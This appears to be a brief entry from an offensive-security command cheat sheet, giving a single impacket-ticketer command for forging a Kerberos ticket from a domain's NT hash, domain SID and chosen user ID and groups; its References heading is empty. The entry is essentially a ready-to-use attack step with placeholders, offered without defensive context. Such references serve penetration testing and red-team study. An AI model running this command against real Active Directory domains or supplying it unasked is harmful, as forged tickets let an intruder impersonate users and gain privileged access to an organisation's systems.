Forge a Kerberos ticket with impacket, by ticket type.
Command: Linux copy
impacket-ticketer -dc-ip $DCIP -nthash $HASH -domain-sid $SID -domain $DOMAIN -user-id $UID -groups '$GROUPS' $USER
References: